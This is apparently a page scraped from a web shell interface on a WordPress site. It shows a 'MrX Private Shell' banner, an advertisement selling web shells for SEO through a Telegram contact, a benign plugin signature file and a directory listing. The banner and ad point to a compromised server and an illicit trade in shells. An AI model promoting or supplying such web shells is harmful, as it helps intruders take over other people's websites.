__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace WP_Statistics\Utils;
class Signature
{
/**
* Generate a signature for the request payload using a WordPress salt.
*
* @param array $payload The request payload.
* @return string The generated signature.
*/
public static function generate($payload)
{
$salt = wp_salt();
return md5($salt . json_encode($payload));
}
/**
* Check if the provided signature matches the generated signature for the given payload.
*
* @param array $payload The request payload.
* @param string $signature The provided signature.
* @return bool True if the signatures match, false otherwise.
*/
public static function check($payload, $signature)
{
return self::generate($payload) === $signature;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Env.php | File | 1.68 KB | 0644 |
|
| Query.php | File | 25.05 KB | 0644 |
|
| Request.php | File | 8.58 KB | 0644 |
|
| Signature.php | File | 805 B | 0644 |
|
| Url.php | File | 4.38 KB | 0644 |
|